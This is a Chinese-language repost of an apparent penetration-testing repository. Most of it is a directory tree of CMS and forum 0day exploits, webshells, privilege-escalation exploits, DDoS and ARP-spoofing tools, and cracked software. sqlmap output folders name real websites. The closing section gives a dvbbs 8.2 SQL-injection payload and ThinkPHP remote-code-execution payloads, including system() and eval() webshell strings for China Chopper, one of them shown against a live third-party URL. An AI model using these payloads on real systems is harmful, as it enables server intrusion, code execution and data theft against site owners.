渗透 超全面的渗透资料💯 包含:0day,xss,sql注入,提权……
No Data
地址https://github.com/w1109790800原文地址
pg)## 目录结构
├─0day & exp │ ├─08CMS │ ├─AKCMS │ ├─bbsxp │ │ ├─BBSxp7.0 │ │ ├─bbsxp综合利用工具 │ │ └─BBSXP论坛漏洞完全注册工具 │ ├─BLUECMS │ ├─CreateLiveCMS │ ├─discuz │ │ ├─discuz │ │ ├─Discuz!PM短消息漏洞利用工具 │ │ ├─discuz2.5x │ │ ├─discuz7 │ │ └─dz │ ├─Diy-Page │ ├─Drupal │ ├─DVBBS │ ├─Ecshop │ ├─joomla │ ├─KINGCMS │ ├─NBArticle │ ├─Oblog │ │ ├─CBlog利用工具 │ │ ├─oblog │ │ │ └─Tool │ │ ├─Oblog 4.X Exp漏洞利用工具 │ │ ├─Oblog4.6SQL版漏洞利用工具 │ │ └─OblogSql │ ├─php168 │ │ ├─php168exp │ │ └─PHP168注入ODAY工具 │ ├─phpbb │ │ ├─phpBB Extractor Reloaded(PHPBB漏洞利用工具) │ │ ├─PHPBB2.0.22MOD版利用工具 │ │ ├─phpbblinkblind │ │ ├─phpbb暴力破解工具 │ │ └─国外的PHPBB2论坛程序攻击工具 │ │ └─国外的PHPBB2论坛程序攻击工具 │ ├─phpcms │ │ ├─PhpCms V9 │ │ │ └─phpv9任意读取文件 │ │ ├─phpcms0dayEXP_内部增强版 │ │ └─phpcms2007 │ ├─PHPweb │ │ └─PHPWEB网站管理系统后台Kedit编辑器漏洞利用代码 │ ├─phpwind │ │ ├─phpwind │ │ ├─phpwind 5.0.1 Sql注射漏洞利用程序.php │ │ ├─phpwind1.3.6论坛利用程序 │ │ ├─PhpWind2.0.2 & 3.31CE漏洞 │ │ ├─PHPWind4.3.2漏洞利用 │ │ ├─phpwind5.x passport_client.php UPDATE SQL Injection POC.php │ │ ├─PHPWindBlog漏洞利用程序 │ │ │ └─phpwindblog │ │ ├─PhpwindWapExp │ │ ├─PHPWIND_exp │ │ └─PHPWIND插件漏洞 │ ├─Shopex │ ├─UCHOME │ ├─wordpress │ ├─Z-BLOG │ ├─乔客JoekoeCMS │ ├─别的一些exp │ │ ├─CBlog利用工具 │ │ ├─EQdkp注入工具 │ │ ├─jsp暴源代码工具 │ │ │ └─jsp暴源代码工具 │ │ │ └─控件包 │ │ ├─L-Blog提权漏洞利用程序 │ │ ├─PJblog V3.0黑客漏洞利用工具 │ │ ├─sablog利用工具 │ │ ├─SuperUpFile1.0 │ │ ├─upfile │ │ ├─“动感下载 v3.0”Cookie注入漏洞利用工具 │ │ ├─乔客exp │ │ ├─凸丫丫 │ │ ├─动力文章系统 │ │ ├─记事狗微博3.0注入利用工具 │ │ ├─逍遥网站整站系统后门扫描器 1.0 │ │ ├─零号KingCMS上传利用 │ │ └─风汛暴库器 │ ├─动易cms │ │ ├─SWInject │ │ ├─动易2005Access版上传漏洞 │ │ ├─动易Region.asp注入辅助工具 │ │ └─动易漏洞利用工具与动画教程 │ ├─动网bbs │ │ ├─动网asp版 │ │ │ ├─DVBBS 7.1.0 SP1 Savepost.asp漏洞工具 │ │ │ ├─dvbbs-qx0507 │ │ │ ├─Dvbbs8后台拿webshell的mdb │ │ │ ├─dvbbsdt.exe │ │ │ ├─动网7.0 sp2提升前台工具 │ │ │ ├─动网7.0 SP2漏洞利用程序 │ │ │ ├─动网7.0sp2前后台权限提升工具 │ │ │ ├─动网7.1sql │ │ │ ├─动网7.1SQL版注入漏洞利用工具 │ │ │ ├─动网7在线人数攻击器增强版 │ │ │ ├─动网8.0sql最新漏洞利用工具 │ │ │ │ └─动网8.0sql最新漏洞利用工具 │ │ │ ├─动网8.0sql漏洞利用工具 │ │ │ │ └─dv8sql │ │ │ ├─动网上传漏洞 │ │ │ ├─动网前台提权+爆后台密码 │ │ │ ├─动网前台提权工具华盟版 │ │ │ ├─动网博客7.1注入漏洞利用工具 │ │ │ ├─动网固顶贴工具 │ │ │ ├─动网帐号提取器 │ │ │ ├─动网日志清除工具 │ │ │ ├─动网空数据库合并成伪ASP木马专用工具 │ │ │ └─动网综合利用工具 │ │ └─动网php版 │ │ └─dvbbs_php2.0_fucker │ ├─帝国EmpireCMS │ ├─新云 │ │ └─xinyun │ ├─科讯KesionCMS │ ├─逐浪CMS │ └─风讯foosunCMS ├─ASP 0day │ ├─ASPCMS │ ├─DvBBS(动网)) │ ├─foosun(风讯) │ ├─Joekoe(乔客) │ ├─kesion(科汛) │ │ ├─kesioncms6.x-7.06 │ │ └─科讯cms利用 │ ├─KingCMS │ ├─newasp(新云) │ ├─[博客] pjblog │ ├─[博客] Z-Blog │ ├─动易cms │ └─老Y文章管理系统 ├─PHP 0day │ ├─DeDeCms(织梦) │ │ ├─Dede+v5.7+feedback.php-12-10-31 │ │ ├─DedeCms buy_action SQL利用工具 │ │ ├─dedecms2 │ │ │ └─dedecms2 │ │ ├─DeDecms各版本0day │ │ │ └─DeDecms vx减缩版 │ │ ├─dedeexp │ │ └─织梦dedecms 5.7上传漏洞代码 │ ├─ECMS(帝国) │ ├─Joomla! │ ├─PageAdmin cms │ ├─PHP168 │ ├─PHPCMS │ │ ├─phpv9任意读取 │ │ └─phpv9漏洞利用工具[1].rar │ │ └─phpv9漏洞利用工具 │ ├─PHPweb │ │ └─PHPWEB网站管理系统后台Kedit编辑器漏洞利用代码 │ ├─ThinkPHP 漏洞 │ ├─Uchome │ ├─vBulletin 4.X │ ├─[BBS] Discuz! │ ├─[BBS] phpWind │ ├─[博客] wordpress │ ├─[商城] EcShop │ │ ├─ecshop漏洞整理 │ │ │ └─ecshop漏洞整理 │ │ │ ├─ec2.6 2.7利用工具 │ │ │ └─ecshop注入exp │ │ ├─eshop_exp │ │ ├─Mc Shop网络商城0day利用工具 │ │ ├─Shopex 4.8.5 │ │ └─shopex_EXP及后台拿shell keio20120826整理版 │ └─[商城] ShopEx │ └─Shopex 注入漏洞 0day (4.8.5) ├─xss 测试 │ └─xss完整版插件keepsenins │ └─xss完整版插件keepsenins │ ├─apps │ │ └─index │ │ ├─action │ │ ├─lib │ │ ├─model │ │ └─view │ │ ├─code │ │ ├─index │ │ ├─project │ │ ├─public │ │ │ ├─js │ │ │ └─style │ │ │ └─toolbar │ │ ├─user │ │ └─xing │ ├─bin │ ├─cache │ ├─config │ ├─static │ │ ├─js │ │ └─style │ └─uauc │ ├─class │ ├─common │ └─core ├─入侵资料 │ ├─3889相关 │ ├─Cookie欺骗入侵网站 │ ├─Linux │ ├─Mssql │ ├─Mysql │ ├─php │ ├─root sa相关 │ ├─vpn │ │ ├─cmd下快速开VPN │ │ │ └─autovpn(非常好的命令行下开vpn工具) │ │ └─jz-vpn-setup │ ├─xss │ │ └─xss完整版插件keepsenins │ │ └─xss完整版插件keepsenins │ │ ├─apps │ │ │ └─index │ │ │ ├─action │ │ │ ├─lib │ │ │ ├─model │ │ │ └─view │ │ │ ├─code │ │ │ ├─index │ │ │ ├─project │ │ │ ├─public │ │ │ │ ├─js │ │ │ │ └─style │ │ │ │ └─toolbar │ │ │ ├─user │ │ │ └─xing │ │ ├─bin │ │ ├─cache │ │ ├─config │ │ ├─static │ │ │ ├─js │ │ │ └─style │ │ └─uauc │ │ ├─class │ │ ├─common │ │ └─core │ ├─上传突破 │ ├─入侵aspx网站 │ ├─入侵技巧 │ ├─入侵文本 │ ├─其他入侵文章 │ │ └─webshell权限让服务器重启 │ ├─其他有用入侵资料 │ │ ├─其他有用入侵资料1 │ │ │ └─ngnix空字节执行漏洞 │ │ └─其他有用入侵资料2 │ ├─其他设备 │ ├─内网渗透相关 │ │ ├─arp │ │ ├─ipc$入侵 │ │ ├─内网入侵 │ │ │ └─内网渗透资料 │ │ │ ├─rpc入侵 │ │ │ └─内网最常用工具下载及使用方法 │ │ ├─内网渗透经典文集_1 │ │ ├─内网渗透经典文集_2 │ │ ├─内网渗透经典文集_3 │ │ ├─域 │ │ ├─端口入侵 │ │ └─远程溢出 │ ├─反弹相关 │ ├─垃圾资料 │ ├─密码 │ └─手工注入 │ ├─access等其他注入 │ ├─MSSQL注入 │ │ └─SA错误修复 │ ├─MYSQl注入 │ ├─Oracle SQL注射 │ ├─PostgreSQL │ ├─sqlmap │ ├─延时注入 │ └─搜型登陆框新注入 ├─大小马 │ ├─asp大马 │ ├─asp小马 │ ├─JSP │ ├─php大马 │ ├─php小马 │ ├─一句话 │ └─菜刀 │ ├─CCC │ └─Customize ├─技术文章 ├─技术资料 ├─提权利器 │ ├─32位系统用户账号密码查看器 │ ├─Api添加用户(F4ck Team) │ ├─linux │ │ ├─2.2.27 │ │ ├─2.2.x │ │ ├─2.4 2.6 │ │ ├─2.4.17 │ │ ├─2.4.18 │ │ ├─2.4.19 │ │ ├─2.4.20 │ │ ├─2.4.21 │ │ ├─2.4.22 │ │ ├─2.4.22-10 │ │ ├─2.4.23 │ │ ├─2.4.24 │ │ ├─2.4.25 │ │ ├─2.4.26 │ │ ├─2.4.27 │ │ ├─2.4.29 │ │ ├─2.4.34 │ │ ├─2.4.x │ │ ├─2.6.10 │ │ ├─2.6.11 │ │ ├─2.6.12 │ │ ├─2.6.13 │ │ ├─2.6.14 │ │ ├─2.6.15 │ │ ├─2.6.16 │ │ ├─2.6.17 │ │ ├─2.6.18 │ │ ├─2.6.2 │ │ ├─2.6.23 - 2.6.24 │ │ ├─2.6.4 │ │ ├─2.6.5 │ │ ├─2.6.7 │ │ ├─2.6.8 │ │ ├─2.6.9 │ │ ├─2.6.9-34 │ │ ├─2.6.x │ │ ├─CentOS5.5 │ │ ├─FreeBSD 4.4 - 4.6 │ │ ├─FreeBSD 4.8 │ │ ├─FreeBSD 5.3 │ │ ├─icons │ │ │ └─img │ │ │ └─mini │ │ ├─Mac OS X │ │ ├─netcat │ │ ├─OpenBSD │ │ ├─r00t-t00ls │ │ ├─red-7.3 │ │ ├─red-8.0 │ │ ├─red-hat8.0 │ │ ├─redhat 7.0 │ │ ├─redhat 7.1 │ │ ├─Root exploits │ │ ├─Spaciel │ │ ├─SunOS 5.10 │ │ ├─SunOS 5.7 │ │ ├─SunOS 5.8 │ │ └─SunOS 5.9 │ ├─LPK2.0 │ ├─NC反弹CMD │ ├─PwDump7破解管理hash │ ├─shell.Users组建vbs提权 │ ├─shift后门 │ ├─T00ls Lpk Sethc v4 │ ├─T00ls_Lpk_Sethc_v3 │ ├─不死帐号 │ ├─免NET提权 │ ├─免参数版pr │ ├─剑眉大侠提权常用EXP │ ├─开3389端口(神器) │ ├─截取3389 │ │ └─dat │ ├─提权工具 │ ├─无NET时添加用户(大胆) │ ├─无NET时添加用户(拉登哥哥) │ ├─星外提权EXP │ │ ├─ee.exe提权法 │ │ └─vbs读取IIS提权法 │ ├─直接抓取Windows明文 │ └─解除TCPIP筛选小工具 ├─注入练习 │ └─sqli-labs-master │ ├─images │ ├─index.html_files │ │ └─icons │ ├─Less-1 │ ├─Less-10 │ ├─Less-11 │ ├─Less-12 │ ├─Less-13 │ ├─Less-14 │ ├─Less-15 │ ├─Less-16 │ ├─Less-17 │ ├─Less-18 │ ├─Less-19 │ ├─Less-2 │ ├─Less-20 │ ├─Less-21 │ ├─Less-22 │ ├─Less-23 │ ├─Less-24 │ ├─Less-25 │ ├─Less-25a │ ├─Less-26 │ ├─Less-26a │ ├─Less-27 │ ├─Less-27a │ ├─Less-28 │ ├─Less-28a │ ├─Less-29 │ ├─Less-3 │ ├─Less-30 │ ├─Less-31 │ ├─Less-4 │ ├─Less-5 │ ├─Less-6 │ ├─Less-7 │ ├─Less-8 │ ├─Less-9 │ └─sql-connections ├─渗透工具 │ ├─3款土耳其注入工具 │ │ └─sql programlar │ │ ├─m4xmysql │ │ ├─sql dökücü │ │ └─Sql Poizon v1.1 │ ├─Access 数据库特殊操作器 │ │ └─Access 数据库特殊操作器 │ ├─Domain3.5 │ │ └─Domain3.5 │ │ └─Domain3.5 │ ├─gason-0.9.5 │ ├─havij │ ├─html 工具 │ ├─hulk │ ├─LiQiDiS_2.71a33 │ │ └─LiQiDiS_2.71a33 │ │ ├─autoSave │ │ ├─config │ │ ├─dict │ │ ├─help │ │ │ ├─ConfigSQLServer │ │ │ │ └─images │ │ │ ├─如何配置基于我的SQLServer服务器转发 │ │ │ │ └─sqlImages │ │ │ └─通过路由器上网的用户如何设置服务器转发 │ │ │ └─images │ │ ├─languages │ │ ├─md5engines │ │ │ ├─hashcrack.com(slow) │ │ │ ├─md5.mmkey.com │ │ │ ├─md5.rednoize.com(slow) │ │ │ ├─md5decryption.com │ │ │ ├─passcracking.com │ │ │ ├─tools.benramsey.com │ │ │ ├─www.md5x.com(_uCode) │ │ │ └─www.xmd5.org │ │ ├─skinSharpSkins │ │ ├─SQL │ │ ├─tools │ │ │ ├─ChinaChopper │ │ │ └─lake2eval_client │ │ │ └─func │ │ ├─upload │ │ │ └─webShells │ │ └─works │ ├─nikto-2.1.5 │ │ ├─databases │ │ ├─docs │ │ ├─plugins │ │ └─templates │ ├─oauth2-server-php-master │ │ ├─src │ │ │ └─OAuth2 │ │ │ ├─Controller │ │ │ ├─GrantType │ │ │ ├─Response │ │ │ ├─ResponseType │ │ │ ├─Storage │ │ │ └─TokenType │ │ └─test │ │ ├─config │ │ ├─lib │ │ │ └─OAuth2 │ │ │ ├─Request │ │ │ └─Storage │ │ └─OAuth2 │ │ ├─GrantType │ │ ├─Server │ │ │ ├─Access │ │ │ ├─Authorize │ │ │ └─Grant │ │ └─Storage │ ├─Openvas中文漏洞扫描器 │ ├─pangoin 3.2.4 │ │ └─pangoin 3.2.4 │ │ └─Pangolin_Professinal_Edition_3[1].2.4.1132_CracKed │ ├─php脱大容量表的优秀代码 by qiushui[r00ts] │ ├─poc 401 │ ├─r00ts蘑菇(玩命青年)webshell木马组合套 │ │ └─星外提权aspx大马(去后门版) │ ├─Slowloris.pl │ ├─snuck │ │ └─payloads │ ├─sqlmap GUI │ │ ├─cfg_dir │ │ ├─doc │ │ ├─extra │ │ │ ├─beep │ │ │ ├─cloak │ │ │ ├─dbgtool │ │ │ ├─icmpsh │ │ │ ├─mssqlsig │ │ │ ├─runcmd │ │ │ │ └─windows │ │ │ │ └─runcmd │ │ │ ├─safe2bin │ │ │ ├─shellcodeexec │ │ │ │ └─linux │ │ │ ├─shutils │ │ │ └─sqlharvest │ │ ├─lib │ │ │ ├─controller │ │ │ ├─core │ │ │ ├─parse │ │ │ ├─request │ │ │ ├─takeover │ │ │ ├─techniques │ │ │ │ ├─blind │ │ │ │ ├─brute │ │ │ │ ├─dns │ │ │ │ ├─error │ │ │ │ └─union │ │ │ └─utils │ │ ├─output │ │ │ ├─2012.100km.qdn.cn │ │ │ ├─grawww.nju.edu.cn │ │ │ ├─liuxue.eastday.com │ │ │ ├─tw.beanfun.com │ │ │ ├─www.artc.net.cn │ │ │ ├─www.bangyuanjiaoyu.com │ │ │ ├─www.facebook.com │ │ │ ├─www.hbetsc.org │ │ │ ├─www.hnslsdxy.com │ │ │ ├─www.jeleechem.com │ │ │ ├─www.jyht.hk │ │ │ ├─www.motocurtain.com │ │ │ └─www.onetouch.cn │ │ ├─plugins │ │ │ ├─dbms │ │ │ │ ├─access │ │ │ │ ├─db2 │ │ │ │ ├─firebird │ │ │ │ ├─maxdb │ │ │ │ ├─mssqlserver │ │ │ │ ├─mysql │ │ │ │ ├─oracle │ │ │ │ ├─postgresql │ │ │ │ ├─sqlite │ │ │ │ └─sybase │ │ │ └─generic │ │ ├─procs │ │ │ ├─mssqlserver │ │ │ ├─mysql │ │ │ ├─oracle │ │ │ └─postgresql │ │ ├─shell │ │ ├─tamper │ │ ├─thirdparty │ │ │ ├─ansistrm │ │ │ ├─beautifulsoup │ │ │ ├─chardet │ │ │ ├─clientform │ │ │ ├─colorama │ │ │ ├─fcrypt │ │ │ ├─gprof2dot │ │ │ ├─keepalive │ │ │ ├─magic │ │ │ ├─multipart │ │ │ ├─odict │ │ │ ├─oset │ │ │ ├─pagerank │ │ │ ├─prettyprint │ │ │ ├─pydes │ │ │ ├─socks │ │ │ ├─termcolor │ │ │ └─xdot │ │ ├─txt │ │ ├─udf │ │ │ ├─mysql │ │ │ │ ├─linux │ │ │ │ │ ├─32 │ │ │ │ │ └─64 │ │ │ │ └─windows │ │ │ │ ├─32 │ │ │ │ └─64 │ │ │ └─postgresql │ │ │ ├─linux │ │ │ │ ├─32 │ │ │ │ │ ├─8.2 │ │ │ │ │ ├─8.3 │ │ │ │ │ ├─8.4 │ │ │ │ │ └─9.0 │ │ │ │ └─64 │ │ │ │ ├─8.2 │ │ │ │ ├─8.3 │ │ │ │ ├─8.4 │ │ │ │ └─9.0 │ │ │ └─windows │ │ │ └─32 │ │ │ ├─8.2 │ │ │ ├─8.3 │ │ │ ├─8.4 │ │ │ └─9.0 │ │ └─xml │ │ └─banner │ ├─struts2 漏洞利用工具 │ │ ├─extlib │ │ ├─lib │ │ │ ├─img │ │ │ ├─skin │ │ │ │ └─button_style_guide │ │ │ ├─sysconfig │ │ │ └─use │ │ ├─plugins │ │ │ ├─e0LfdE8DMNm09Dbc │ │ │ ├─m1x7pUSLJT6gBdy8 │ │ │ ├─tmp │ │ │ │ ├─cajcxyktchvglqgb │ │ │ │ ├─gyqqzilgggacqyvz │ │ │ │ ├─ocxdgefpyqfegdgb │ │ │ │ ├─oquomowzpdsdgqfp │ │ │ │ ├─oypxqfvdvylttpwf │ │ │ │ ├─oywojapgdtpzewvv │ │ │ │ ├─unsxczsdozetwfyv │ │ │ │ ├─vjqdxsqlefyekjyx │ │ │ │ ├─vmokdgbjnxmezswo │ │ │ │ ├─xlsalbluxbqoimeb │ │ │ │ └─xvyvduvlwcsyerqd │ │ │ ├─_toolmao_sys_CMD │ │ │ │ └─skin │ │ │ │ └─button_style_flex │ │ │ ├─_toolmao_sys_工具猫 │ │ │ ├─_toolmao_sys_扩展函数库 │ │ │ ├─_toolmao_sys_程序管理器 │ │ │ ├─_toolmao_sys_魔盒设置 │ │ │ │ └─skin │ │ │ │ └─button_style_flex │ │ │ └─取色工具 │ │ └─测试 │ ├─Umbrella Project 2012 │ │ └─list │ ├─WebDDOS │ ├─WebRobot │ │ ├─data │ │ │ ├─dict │ │ │ │ └─eWebEditor │ │ │ │ └─SysImage │ │ │ │ ├─bg │ │ │ │ ├─emot │ │ │ │ └─file │ │ │ ├─keyword │ │ │ └─tools │ │ │ ├─lake2eval_client │ │ │ │ └─func │ │ │ └─ShellManager │ │ └─log │ │ └─config │ ├─WebSploit Framework V.2.0.3 │ ├─websurgery │ │ └─WebSurgery_v06 │ ├─WSExplorer │ ├─Xenotix_XSS_Exploitation_Framework │ │ └─Xenotix XSS Exploitation Framework │ │ └─build │ │ └─Application Files │ │ └─Xenotix XSS Exploit Framework_1_0_0_110 │ ├─一个扫C段WEB敏感信息的工具 │ │ └─一个扫C段WEB敏感信息的工具 │ │ └─一个扫C段WEB敏感信息的工具 │ │ └─plugins │ ├─啊D扫目录asp+字典 │ │ └─啊D扫目录asp+字典 │ ├─国外超强注入工具Cfm Private SQL Injection │ │ └─国外超强综合注入程序Cfm Private SQL Injection Tool │ │ └─hackcfm_private_src │ ├─御剑 1.5 │ │ ├─临时处理数据文件夹 │ │ └─配置文件 │ ├─文件合并工具 │ ├─目录字典 │ ├─老兵COOKIES欺骗工具 │ │ └─老兵COOKIES欺骗工具 │ ├─脱裤打包 │ │ ├─aspwebbackup │ │ └─mssql │ └─雷池加密解密 │ └─雷池加密解密 ├─漏洞汇总 │ ├─BT5 MSF JAVA 0day CVE-2013-0422 Exploit Demo By K8team │ │ └─BT5 MSF JAVA 0day CVE-2013-0422 Exploit Demo By K8team │ ├─dede全部exp │ │ └─Dede+v5.7+feedback.php-12-10-31 │ ├─ecshop │ ├─ECSHOP全版本注入0DAY │ ├─fck.py │ ├─MySQL hash 登陆0day及exp │ │ └─MySQL hash 登陆0day及exp │ ├─mysql_win_remote_stuxnet_technique;mysql溢出 │ │ ├─1 │ │ │ └─mysql_scanner │ │ │ └─mysql_scanner │ │ └─mysql_win_remote_stuxnet_technique │ │ └─mysql_scanner │ │ └─mysql_scanner │ ├─phpcms │ │ └─phpv9任意读取 │ ├─PHPWEB网站管理系统后台Kedit编辑器漏洞利用代码 │ ├─Shopex 注入漏洞 0day (4.8.5) │ ├─struts2 漏洞利用工具 │ │ └─struts2 漏洞利用工具 │ │ ├─extlib │ │ ├─lib │ │ │ ├─img │ │ │ ├─skin │ │ │ │ └─button_style_guide │ │ │ ├─sysconfig │ │ │ └─use │ │ ├─plugins │ │ │ ├─e0LfdE8DMNm09Dbc │ │ │ ├─m1x7pUSLJT6gBdy8 │ │ │ ├─tmp │ │ │ │ ├─cajcxyktchvglqgb │ │ │ │ ├─ocxdgefpyqfegdgb │ │ │ │ ├─oquomowzpdsdgqfp │ │ │ │ ├─oypxqfvdvylttpwf │ │ │ │ ├─oywojapgdtpzewvv │ │ │ │ ├─vjqdxsqlefyekjyx │ │ │ │ ├─vmokdgbjnxmezswo │ │ │ │ ├─xlsalbluxbqoimeb │ │ │ │ └─xvyvduvlwcsyerqd │ │ │ ├─_toolmao_sys_CMD │ │ │ │ └─skin │ │ │ │ └─button_style_flex │ │ │ ├─_toolmao_sys_工具猫 │ │ │ ├─_toolmao_sys_扩展函数库 │ │ │ ├─_toolmao_sys_程序管理器 │ │ │ ├─_toolmao_sys_魔盒设置 │ │ │ │ └─skin │ │ │ │ └─button_style_flex │ │ │ └─取色工具 │ │ └─测试 │ └─记事狗微博3.0注入利用工具 └─终端工具 ├─APMServ-v5.2.6 ├─Cain4.9 │ └─Cain4.9 │ ├─Winrtgen │ └─Wordlists ├─FTP架设器 ├─HFS网络文件服务器2.3 ├─IIS信息查看软件 ├─MAC地址修改器 ├─MAC地址扫描器 ├─NetFuke (arp欺骗) │ ├─dic │ ├─dll │ ├─inc │ ├─log │ ├─ocx │ └─voice ├─SYN数据流量攻击器 ├─TV远控完美破解版 ├─一款最牛清理C盘工具 ├─七行者IP代理验证 V1.3 ├─大侠专用擦PP工具 ├─幻境网盾(无视ARP防火墙) ├─直接使服务器蓝屏重启的东东 │ └─MS12-020 PoC[bug修正版 + 数据包nc发送版] │ └─数据包nc发送版 ├─端口转发神器--reDuh │ └─reDuhServers ├─组策略清除工具1.1
[dvbbs 8.2 SQL注射漏洞分析 全文]漏洞公告:http://seclists.org/bugtraq/2008/May/0330.html利用方式:一个典型的sql注射漏洞,按照公告里说的用
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&am
漏洞分析:动网在asp领域也算一个比较元老的程序,这次在8.2新版里有一个低级的错误.漏洞代码在login.asp 118行左右
......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = unescape(username)
......
取得的username是先经过检查然后再unescape解码,导致用urlencode模式就可以饶过任何检查,和php的urldecode导致的注射很类似,譬如用%2527就可以提交’过去了.
2.0版本 /ThinkPHP/Lib/Think/Util/Dispatcher.class.php2.1版本/ThinkPHP/Lib/Core/Dispatcher.class.php
搜索preg_replace 有一段替换使用了/e模式, 而且thinkphp底层没有提供参数的过滤, 这边就直接崩溃了。
测试代码
/index.php/Module/Action/Param/${@phpinfo()}
http://www.js.10086.cn/wxcs/ppo/YC/index.php/Public/MedInsurance/1/%7B$%7Bphpinfo()%7D%7D
/admin//index.php/public/login
去掉login 版本信息出来
最近thinkphp框架爆出了一个任意代码执行漏洞,其威胁程序相当的高,漏洞利用方法如下:
index.php/module/aciton/param1/${@print(THINK_VERSION)}index.php
/module/aciton/param1/${@function_all()}
其中function_all代表任何函数,
比如:index.php/module/aciton/param1/${@phpinfo()}
获取服务器的系统配置信息等。
index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al
列出网站文件列表
index.php/module/action/param1/{${eval($_POST[s])}}
直接执行一句话代码,用菜刀直接连接.